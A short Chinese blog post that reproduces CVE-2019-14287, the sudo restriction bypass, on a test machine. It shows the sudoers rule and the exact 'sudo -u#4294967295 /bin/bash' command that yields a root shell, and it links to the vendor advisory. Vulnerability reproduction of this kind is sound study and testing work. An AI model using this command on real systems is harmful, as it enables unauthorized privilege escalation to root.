运维开发网

(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

运维开发网 https://www.qedev.com 2020-07-21 15:05 出处:网络
1:查看测试机sudo版本号,确认是受影响版本。 2:创建账号test 3:进入/etc,备份一下sudoers到/root,然后修改sudoers内容,添加:

1:查看测试机sudo版本号,确认是受影响版本。

(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

file://c:\users\sz\appdata\local\temp\tmpntilbq\1.png

2:创建账号test

分享图片

file://c:\users\sz\appdata\local\temp\tmpntilbq\2.png

3:进入/etc,备份一下sudoers到/root,然后修改sudoers内容,添加:

test  ALL=(ALL,!root) /bin/bash

分享图片

file://c:\users\sz\appdata\local\temp\tmpntilbq\3.png

file://c:\users\sz\appdata\local\temp\tmpntilbq\4.png

file://c:\users\sz\appdata\local\temp\tmpntilbq\5.png

4:登录test账号,

file://c:\users\sz\appdata\local\temp\tmpntilbq\6.png

分享图片

 

 sudo -u#4294967295 /bin/bash

(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

 

 

受影响的Sudo版本:

1.8.28之前的Sudo版本会受到影响。

=======================================

参考链接:

https://www.sudo.ws/alerts/minus_1_uid.html

https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA

https://mp.weixin.qq.com/s/1-WQSiB1Yc_sPYh928TXkw

0

精彩评论

暂无评论...
验证码 换一张
取 消